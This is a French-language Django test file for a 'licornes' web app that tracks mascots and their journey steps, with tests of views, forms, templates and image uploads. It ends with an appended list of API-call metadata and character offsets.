            any("licorne/1" in a.get("href", "") for a in soup.find_all("a"))
        )

    def test_aucune_licorne_nest_active(self):
        response = self.client.get(reverse('index'))
        soup = BeautifulSoup(response.content, features="html.parser")
        # On the index page no licorne link should be highlighted as active.
        active_in_a_class = sum(
            1 for a in soup.find_all("a") if "active" in a.get("class", [])
        )
        self.assertFalse(active_in_a_class)

    def test_pas_de_polyline(self):
        response = self.client.get(reverse('index'))
        self.assertNotIn("google.maps.Polyline", str(response.content))
class AddViewTest(TestCase):
    """Exercise the licorne creation form: rendering, validation, redirects."""

    @classmethod
    def setUpTestData(cls):
        cls.identifiant_existant = "777"
        cls.identifiant_inexistant = "666"
        # Plain literals: the original f-strings had no placeholder.
        User.objects.create(username="kuala")
        u = User.objects.get(username="kuala")
        Licorne.objects.create(
            nom=f'Licorne de {u}',
            identifiant=f'{cls.identifiant_existant}',
            createur=u,
        )
        cls.u = u
        cls.l = Licorne.objects.get(identifiant=cls.identifiant_existant)

    def test_view_url_exists_at_desired_location(self):
        response = self.client.get('/licornes/add/')
        self.assertEqual(response.status_code, 200)

    def test_view_url_accessible_by_name(self):
        response = self.client.get(reverse('add'))
        self.assertEqual(response.status_code, 200)

    def test_view_uses_correct_template(self):
        response = self.client.get(reverse('add'))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'licornes/licorne_form.html')

    def test_view_titre(self):
        response = self.client.get(reverse('add'))
        self.assertEqual(response.status_code, 200)
        self.assertIn("Ajouter une licorne", str(response.content))

    def test_view_fields_presents(self):
        response = self.client.get(reverse('add'))
        self.assertEqual(response.status_code, 200)
        content = str(response.content)
        self.assertIn("Nom", content)
        self.assertIn("Identifiant", content)
        self.assertNotIn("Photo", content)
        self.assertIn("Image", content)
        self.assertNotIn("+ Ajouter une licorne", content)

    def test_redirects_to_etape_on_success(self):
        # A valid form post (including an image upload) must redirect to the
        # "etape" view of the newly created licorne.
        with open(os.path.join("licornes/tests", "image-test.jpg"), "rb") as i:
            response = self.client.post(reverse('add'), {"nom": "Bouou", "identifiant": self.identifiant_inexistant, "createur": self.u.id, "image": i})
        self.assertRedirects(response, reverse('etape', args=[self.identifiant_inexistant]))

    def test_nom_ne_peut_pas_etre_vide(self):
        response = self.client.post(reverse('add'), {"nom": "", "identifiant": self.identifiant_inexistant, "createur": self.u.id})
        self.assertEqual(response.status_code, 200)
        self.assertFormError(response, 'form', 'nom', 'Ce champ est obligatoire.')

    def test_identifiant_ne_peut_pas_etre_vide(self):
        response = self.client.post(reverse('add'), {"nom": "UIOU", "identifiant": "", "createur": self.u.id})
        self.assertEqual(response.status_code, 200)
        self.assertFormError(response, 'form', 'identifiant', 'Ce champ est obligatoire.')

    def test_champ_image_peut_etre_vide(self):
        response = self.client.post(reverse('add'), {"nom": "Bouou", "identifiant": self.identifiant_inexistant, "createur": self.u.id, "image": ""})
        self.assertRedirects(response, reverse('etape', args=[self.identifiant_inexistant]))

    def test_champ_image_doit_etre_une_image(self):
        # A non-image upload must be rejected by the ImageField validator.
        with open(os.path.join("licornes/tests", "spam.txt"), "r") as i:
            response = self.client.post(reverse('add'), {"nom": "Bouou", "identifiant": self.identifiant_inexistant, "createur": self.u.id, "image": i})
        self.assertEqual(response.status_code, 200)
        self.assertFormError(response, 'form', 'image', "Téléversez une image valide. Le fichier que vous avez transféré n'est pas une image ou bien est corrompu.")
class EtapeViewTest(TestCase):
    """Exercise the "etape" (journey step) creation view and its validation."""

    @classmethod
    def setUpTestData(cls):
        cls.identifiant_existant = "777"
        cls.identifiant_inexistant = "666"
        # Plain literals: the original f-strings had no placeholder.
        User.objects.create(username="kuala")
        u = User.objects.get(username="kuala")
        Licorne.objects.create(
            nom=f'Licorne de {u}',
            identifiant=f'{cls.identifiant_existant}',
            createur=u,
        )
        cls.u = u
        cls.l = Licorne.objects.get(identifiant=cls.identifiant_existant)

    # The argument-less URL variant is no longer supported.
    def test_view_url_returns_404_if_no_licorne(self):
        response = self.client.get('/licornes/etape/')
        self.assertEqual(response.status_code, 404)

    def test_view_url_by_name_404_if_no_licorne(self):
        response = self.client.get(reverse('etape'))
        self.assertEqual(response.status_code, 404)

    # Variant with a licorne identifier.
    def test_view_url_exists_at_desired_location(self):
        response = self.client.get('/licornes/etape/%s/' % (self.identifiant_existant))
        self.assertEqual(response.status_code, 200)

    def test_view_url_accessible_by_name(self):
        response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
        self.assertEqual(response.status_code, 200)

    def test_view_uses_correct_template(self):
        response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'licornes/etape_form.html')

    def test_view_titre(self):
        licorne = Licorne.objects.get(identifiant=self.identifiant_existant)
        response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
        self.assertEqual(response.status_code, 200)
        soup = BeautifulSoup(response.content, features="html.parser")
        self.assertEqual(soup.h1.string, "Ajouter une étape pour %s" % (licorne))

    def test_view_fields_presents(self):
        response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
        self.assertEqual(response.status_code, 200)
        soup = BeautifulSoup(response.content, features="html.parser")
        labels = [label["for"] for label in soup.find_all("label")]
        self.assertIn("id_localisation", labels)
        self.assertNotIn("id_current", labels)
        self.assertIn("id_auteur", labels)
        self.assertIn("id_media", labels)
        # The licorne is carried in a hidden input field; .get() avoids a
        # KeyError on inputs lacking a type or name attribute.
        self.assertTrue(
            any(i.get("type") == "hidden" and i.get("name") == "licorne"
                for i in soup.find_all("input"))
        )

    def test_view_autocomplete_present(self):
        response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
        self.assertEqual(response.status_code, 200)
        soup = BeautifulSoup(response.content, features="html.parser")
        # The localisation field relies on a JS autocomplete script.
        self.assertTrue(
            any("autocomplete.js" in s["src"]
                for s in soup.find_all("script") if s.has_attr("src"))
        )

    def test_view_creer_si_inexistante(self):
        # When the identifier matches no existing licorne, the view offers to
        # create one instead of failing.
        response = self.client.get(reverse('etape', args=[self.identifiant_inexistant]))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'licornes/creer.html')
        soup = BeautifulSoup(response.content, features="html.parser")
        self.assertIn("J'irai où tu iras", soup.title)
        self.assertIn("Licorne inexistante", soup.h1.string)
        self.assertTrue(any("/add" in a.get("href", "") for a in soup.find_all("a")))
        self.assertIn(f"{self.identifiant_inexistant}", str(response.content))

    def test_form_etape_valeur_initiale_licorne(self):
        response = self.client.get(reverse('etape', args=[self.identifiant_existant]))
        self.assertEqual(response.status_code, 200)
        licorne = Licorne.objects.get(identifiant=self.identifiant_existant)
        self.assertEqual(response.context['form'].initial['licorne'], licorne)

    def test_redirects_to_index_on_success(self):
        response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "Pau, France", "auteur": self.u.id, "media": "Tagalok", "licorne": self.l.id})
        self.assertRedirects(response, reverse('index'))

    def test_form_invalid_licorne(self):
        wrong_id = 78787897873
        response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "Pau, France", "auteur": self.u.id, "media": "Tagalok", "licorne": wrong_id})
        self.assertEqual(response.status_code, 200)
        self.assertFormError(response, 'form', 'licorne', 'Sélectionnez un choix valide. Ce choix ne fait pas partie de ceux disponibles.')

    def test_form_invalid_localisation(self):
        response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "", "auteur": self.u.id, "media": "Tagalok", "licorne": self.l.id})
        self.assertEqual(response.status_code, 200)
        self.assertFormError(response, 'form', 'localisation', 'Ce champ est obligatoire.')

    def test_form_invalid_auteur(self):
        wrong_id = 78787897873
        response = self.client.post(reverse('etape', args=[self.l.identifiant]), {"localisation": "Pau, France", "auteur": wrong_id, "media": "Tagalok", "licorne": self.l.id})
        self.assertEqual(response.status_code, 200)
        self.assertFormError(response, 'form', 'auteur', 'Sélectionnez un choix valide. Ce choix ne fait pas partie de ceux disponibles.')
class LicorneViewTest(TestCase):
    """Exercise the detail view of a single licorne."""

    @classmethod
    def setUpTestData(cls):
        # Create a few users, each owning the same number of licornes, and
        # keep the created objects so the tests can reference their ids.
        number_of_creators = 2
        number_of_licornes = 3
        cls.total_licornes = number_of_creators * number_of_licornes
        cls.licornes_de_test = []
        for user_id in range(number_of_creators):
            User.objects.create(username=f"utilisateur {user_id}")
            u = User.objects.get(username=f"utilisateur {user_id}")
            for licorne_id in range(number_of_licornes):
                Licorne.objects.create(
                    nom=f'Licorne {licorne_id} de {user_id}',
                    identifiant=f'{user_id}-{licorne_id}',
                    createur=u,
                    image=f'{licorne_id}.png',
                )
                cls.licornes_de_test.append(Licorne.objects.latest("id"))

    def test_view_url_exists_at_desired_location(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(f'/licornes/licorne/{id_lic}/')
        self.assertEqual(response.status_code, 200)

    def test_view_url_redirected_if_no_trailing_slash(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(f'/licornes/licorne/{id_lic}')
        self.assertEqual(response.status_code, 301)

    def test_view_url_accessible_by_name(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        self.assertEqual(response.status_code, 200)

    def test_view_uses_correct_template(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'licornes/licorne.html')

    def test_licornes_are_present(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        self.assertEqual(response.status_code, 200)
        # assertIn / assertEqual give more useful failure messages than
        # assertTrue(... in ...) / assertTrue(... == ...).
        self.assertIn('meslicornes', response.context)
        self.assertEqual(len(response.context['meslicornes']), self.total_licornes)
        self.assertIn("Licorne 0 de 0", str(response.content))

    def test_titres_present(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        self.assertEqual(response.status_code, 200)
        self.assertIn("Mes licornes", str(response.content))
        self.assertInHTML("Trajet", str(response.content))

    def test_bouton_ajouter_present(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        self.assertEqual(response.status_code, 200)
        self.assertIn("+ Ajouter une licorne", str(response.content))

    def test_div_map_present(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        soup = BeautifulSoup(response.content, features="html.parser")
        # The map container must exist for the front-end script to draw into.
        self.assertIsNotNone(soup.find("div", id="map"))

    def test_liens_vers_licornes_presents(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        soup = BeautifulSoup(response.content, features="html.parser")
        # .get() avoids a KeyError on anchors that carry no href attribute.
        self.assertTrue(
            any("licorne/1" in a.get("href", "") for a in soup.find_all("a"))
        )

    def test_une_licorne_est_active(self):
        id_lic = self.licornes_de_test[3].id
        response = self.client.get(reverse('licorne', args=[id_lic]))
        soup = BeautifulSoup(response.content, features="html.parser")
        # Exactly one licorne link should be highlighted as active.
        active_in_a_class = sum(
            1 for a in soup.find_all("a") if "active" in a.get("class", [])
        )
        self.assertEqual(active_in_a_class, 1)

    def test_licornes_ont_badge(self):
        response = self.client.get(reverse('index'))
        soup = BeautifulSoup(response.content, features="html.parser")
        badges_de_licornes = sum(
            1 for h2 in soup.find_all("h2")
            if h2.span and "badge" in h2.span["class"]
        )
        self.assertTrue(badges_de_licornes)
        self.assertEqual(badges_de_licornes, self.total_licornes)

    def test_licornes_ont_image(self):
        response = self.client.get(reverse('index'))
        soup = BeautifulSoup(response.content, features="html.parser")
        lics = soup.find_all(attrs={"class": "list-group-item"})
        lic_img = 0
        bons_noms_dimages = 0
        for l in lics:
            # BUG FIX: re.M was previously passed as the positional ``count``
            # argument of re.sub (re.M == 8, so "replace up to 8 matches"),
            # not as a flag; it must be given as ``flags=``.
            numero = re.sub("Licorne ([0-9]+).*", "\\1", l.h2.text, flags=re.M)[0:4].strip()
            if l.img:
                lic_img += 1
                if os.path.basename(l.img["src"]) == f'{numero}.png':
                    bons_noms_dimages += 1
        self.assertTrue(lic_img)
        self.assertTrue(bons_noms_dimages)
        self.assertEqual(lic_img, len(lics))
        self.assertEqual(bons_noms_dimages, len(lics))
class MediaViewTest(TestCase):
    """Exercise the media view attached to an Etape (journey step)."""

    @classmethod
    def setUpTestData(cls):
        cls.identifiant_existant = "777"
        cls.identifiant_inexistant = "666"
        # Plain literals: the original f-strings had no placeholder.
        User.objects.create(username="kuala")
        u = User.objects.get(username="kuala")
        Licorne.objects.create(
            nom=f'Licorne de {u}',
            identifiant=f'{cls.identifiant_existant}',
            createur=u,
        )
        l = Licorne.objects.get(nom=f'Licorne de {u}')
        # Three steps along the licorne's journey.  Manager.create() already
        # saves the object, so the redundant .save() calls were dropped.
        for localisation in ("Paris, France", "Berlin, Allemagne", "San Francisco"):
            Etape.objects.create(licorne=l, auteur=u, localisation=localisation)

    # Variant with an etape id argument.
    def test_view_url_exists_at_desired_location(self):
        e1 = Etape.objects.get(localisation="Berlin, Allemagne")
        response = self.client.get('/licornes/media/%s/' % (e1.id))
        self.assertEqual(response.status_code, 200)

    def test_view_url_accessible_by_name(self):
        e1 = Etape.objects.get(localisation="Berlin, Allemagne")
        response = self.client.get(reverse('media', args=[e1.id]))
        self.assertEqual(response.status_code, 200)

    def test_404_if_nonexistant_id(self):
        response = self.client.get(reverse('media', args=[11111111]))
        self.assertEqual(response.status_code, 404)
|
[
"licornes.models.User.objects.create",
"licornes.models.Licorne.objects.create",
"os.path.basename",
"licornes.models.Licorne.objects.latest",
"licornes.models.Etape.objects.get",
"licornes.models.Etape.objects.create",
"licornes.models.Licorne.objects.get",
"licornes.models.User.objects.get",
"django.urls.reverse",
"bs4.BeautifulSoup",
"os.path.join",
"re.sub"
] |
[((2123, 2178), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (2136, 2178), False, 'from bs4 import BeautifulSoup\n'), ((3067, 3122), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (3080, 3122), False, 'from bs4 import BeautifulSoup\n'), ((3466, 3521), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (3479, 3521), False, 'from bs4 import BeautifulSoup\n'), ((3885, 3940), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (3898, 3940), False, 'from bs4 import BeautifulSoup\n'), ((4554, 4592), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (4573, 4592), False, 'from licornes.models import User\n'), ((4605, 4640), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (4621, 4640), False, 'from licornes.models import User\n'), ((4650, 4755), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne de {u}"""', 'identifiant': 'f"""{cls.identifiant_existant}"""', 'createur': 'u'}), "(nom=f'Licorne de {u}', identifiant=\n f'{cls.identifiant_existant}', createur=u)\n", (4672, 4755), False, 'from licornes.models import Licorne\n'), ((4836, 4893), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'cls.identifiant_existant'}), '(identifiant=cls.identifiant_existant)\n', (4855, 4893), False, 'from licornes.models import Licorne\n'), ((8192, 8230), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (8211, 8230), False, 
'from licornes.models import User\n'), ((8243, 8278), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (8259, 8278), False, 'from licornes.models import User\n'), ((8288, 8393), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne de {u}"""', 'identifiant': 'f"""{cls.identifiant_existant}"""', 'createur': 'u'}), "(nom=f'Licorne de {u}', identifiant=\n f'{cls.identifiant_existant}', createur=u)\n", (8310, 8393), False, 'from licornes.models import Licorne\n'), ((8474, 8531), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'cls.identifiant_existant'}), '(identifiant=cls.identifiant_existant)\n', (8493, 8531), False, 'from licornes.models import Licorne\n'), ((9632, 9690), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'identifiant': 'self.identifiant_existant'}), '(identifiant=self.identifiant_existant)\n', (9651, 9690), False, 'from licornes.models import Licorne\n'), ((9845, 9900), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (9858, 9900), False, 'from bs4 import BeautifulSoup\n'), ((10195, 10250), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (10208, 10250), False, 'from bs4 import BeautifulSoup\n'), ((11098, 11153), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (11111, 11153), False, 'from bs4 import BeautifulSoup\n'), ((11913, 11968), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (11926, 11968), False, 'from bs4 import BeautifulSoup\n'), ((12606, 12664), 'licornes.models.Licorne.objects.get', 
'Licorne.objects.get', ([], {'identifiant': 'self.identifiant_existant'}), '(identifiant=self.identifiant_existant)\n', (12625, 12664), False, 'from licornes.models import Licorne\n'), ((18104, 18159), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (18117, 18159), False, 'from bs4 import BeautifulSoup\n'), ((18565, 18620), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (18578, 18620), False, 'from bs4 import BeautifulSoup\n'), ((19042, 19097), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (19055, 19097), False, 'from bs4 import BeautifulSoup\n'), ((19533, 19588), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (19546, 19588), False, 'from bs4 import BeautifulSoup\n'), ((19991, 20046), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content'], {'features': '"""html.parser"""'}), "(response.content, features='html.parser')\n", (20004, 20046), False, 'from bs4 import BeautifulSoup\n'), ((20783, 20821), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (20802, 20821), False, 'from licornes.models import User\n'), ((20834, 20869), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""kuala"""'}), "(username=f'kuala')\n", (20850, 20869), False, 'from licornes.models import User\n'), ((20879, 20984), 'licornes.models.Licorne.objects.create', 'Licorne.objects.create', ([], {'nom': 'f"""Licorne de {u}"""', 'identifiant': 'f"""{cls.identifiant_existant}"""', 'createur': 'u'}), "(nom=f'Licorne de {u}', identifiant=\n f'{cls.identifiant_existant}', createur=u)\n", (20901, 20984), False, 'from 
licornes.models import Licorne\n'), ((21043, 21085), 'licornes.models.Licorne.objects.get', 'Licorne.objects.get', ([], {'nom': 'f"""Licorne de {u}"""'}), "(nom=f'Licorne de {u}')\n", (21062, 21085), False, 'from licornes.models import Licorne\n'), ((21099, 21170), 'licornes.models.Etape.objects.create', 'Etape.objects.create', ([], {'licorne': 'l', 'auteur': 'u', 'localisation': '"""Paris, France"""'}), "(licorne=l, auteur=u, localisation='Paris, France')\n", (21119, 21170), False, 'from licornes.models import Etape\n'), ((21202, 21277), 'licornes.models.Etape.objects.create', 'Etape.objects.create', ([], {'licorne': 'l', 'auteur': 'u', 'localisation': '"""Berlin, Allemagne"""'}), "(licorne=l, auteur=u, localisation='Berlin, Allemagne')\n", (21222, 21277), False, 'from licornes.models import Etape\n'), ((21309, 21380), 'licornes.models.Etape.objects.create', 'Etape.objects.create', ([], {'licorne': 'l', 'auteur': 'u', 'localisation': '"""San Francisco"""'}), "(licorne=l, auteur=u, localisation='San Francisco')\n", (21329, 21380), False, 'from licornes.models import Etape\n'), ((21497, 21548), 'licornes.models.Etape.objects.get', 'Etape.objects.get', ([], {'localisation': '"""Berlin, Allemagne"""'}), "(localisation='Berlin, Allemagne')\n", (21514, 21548), False, 'from licornes.models import Etape\n'), ((21745, 21796), 'licornes.models.Etape.objects.get', 'Etape.objects.get', ([], {'localisation': '"""Berlin, Allemagne"""'}), "(localisation='Berlin, Allemagne')\n", (21762, 21796), False, 'from licornes.models import Etape\n'), ((627, 681), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (646, 681), False, 'from licornes.models import User\n'), ((698, 749), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (714, 749), False, 'from licornes.models import User\n'), 
((1265, 1281), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (1272, 1281), False, 'from django.urls import reverse\n'), ((1418, 1434), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (1425, 1434), False, 'from django.urls import reverse\n'), ((1630, 1646), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (1637, 1646), False, 'from django.urls import reverse\n'), ((2090, 2106), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2097, 2106), False, 'from django.urls import reverse\n'), ((2545, 2561), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2552, 2561), False, 'from django.urls import reverse\n'), ((2818, 2834), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2825, 2834), False, 'from django.urls import reverse\n'), ((3034, 3050), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (3041, 3050), False, 'from django.urls import reverse\n'), ((3433, 3449), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (3440, 3449), False, 'from django.urls import reverse\n'), ((3852, 3868), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (3859, 3868), False, 'from django.urls import reverse\n'), ((4294, 4310), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (4301, 4310), False, 'from django.urls import reverse\n'), ((5140, 5154), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5147, 5154), False, 'from django.urls import reverse\n'), ((5291, 5305), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5298, 5305), False, 'from django.urls import reverse\n'), ((5498, 5512), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5505, 5512), False, 'from django.urls import reverse\n'), ((5715, 5729), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (5722, 5729), False, 'from 
django.urls import reverse\n'), ((6559, 6611), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_inexistant]'}), "('etape', args=[self.identifiant_inexistant])\n", (6566, 6611), False, 'from django.urls import reverse\n'), ((6696, 6710), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (6703, 6710), False, 'from django.urls import reverse\n'), ((7018, 7032), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (7025, 7032), False, 'from django.urls import reverse\n'), ((7320, 7334), 'django.urls.reverse', 'reverse', (['"""add"""'], {}), "('add')\n", (7327, 7334), False, 'from django.urls import reverse\n'), ((7473, 7525), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_inexistant]'}), "('etape', args=[self.identifiant_inexistant])\n", (7480, 7525), False, 'from django.urls import reverse\n'), ((8842, 8858), 'django.urls.reverse', 'reverse', (['"""etape"""'], {}), "('etape')\n", (8849, 8858), False, 'from django.urls import reverse\n'), ((9221, 9271), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (9228, 9271), False, 'from django.urls import reverse\n'), ((9408, 9458), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (9415, 9458), False, 'from django.urls import reverse\n'), ((9726, 9776), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (9733, 9776), False, 'from django.urls import reverse\n'), ((10076, 10126), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (10083, 10126), False, 'from django.urls import reverse\n'), ((10979, 11029), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': 
'[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (10986, 11029), False, 'from django.urls import reverse\n'), ((11727, 11779), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_inexistant]'}), "('etape', args=[self.identifiant_inexistant])\n", (11734, 11779), False, 'from django.urls import reverse\n'), ((12484, 12534), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.identifiant_existant]'}), "('etape', args=[self.identifiant_existant])\n", (12491, 12534), False, 'from django.urls import reverse\n'), ((12972, 13015), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (12979, 13015), False, 'from django.urls import reverse\n'), ((13152, 13168), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (13159, 13168), False, 'from django.urls import reverse\n'), ((13279, 13322), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (13286, 13322), False, 'from django.urls import reverse\n'), ((13694, 13737), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (13701, 13737), False, 'from django.urls import reverse\n'), ((14076, 14119), 'django.urls.reverse', 'reverse', (['"""etape"""'], {'args': '[self.l.identifiant]'}), "('etape', args=[self.l.identifiant])\n", (14083, 14119), False, 'from django.urls import reverse\n'), ((15339, 15393), 'licornes.models.User.objects.create', 'User.objects.create', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (15358, 15393), False, 'from licornes.models import User\n'), ((15410, 15461), 'licornes.models.User.objects.get', 'User.objects.get', ([], {'username': 'f"""utilisateur {user_id}"""'}), "(username=f'utilisateur {user_id}')\n", (15426, 15461), False, 'from 
licornes.models import User\n'), ((16432, 16465), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (16439, 16465), False, 'from django.urls import reverse\n'), ((16647, 16680), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (16654, 16680), False, 'from django.urls import reverse\n'), ((16923, 16956), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (16930, 16956), False, 'from django.urls import reverse\n'), ((17441, 17474), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (17448, 17474), False, 'from django.urls import reverse\n'), ((17776, 17809), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (17783, 17809), False, 'from django.urls import reverse\n'), ((18054, 18087), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (18061, 18087), False, 'from django.urls import reverse\n'), ((18515, 18548), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (18522, 18548), False, 'from django.urls import reverse\n'), ((18992, 19025), 'django.urls.reverse', 'reverse', (['"""licorne"""'], {'args': '[id_lic]'}), "('licorne', args=[id_lic])\n", (18999, 19025), False, 'from django.urls import reverse\n'), ((19500, 19516), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (19507, 19516), False, 'from django.urls import reverse\n'), ((19958, 19974), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (19965, 19974), False, 'from django.urls import reverse\n'), ((21832, 21862), 'django.urls.reverse', 'reverse', (['"""media"""'], {'args': '[e1.id]'}), "('media', args=[e1.id])\n", (21839, 21862), False, 'from django.urls import 
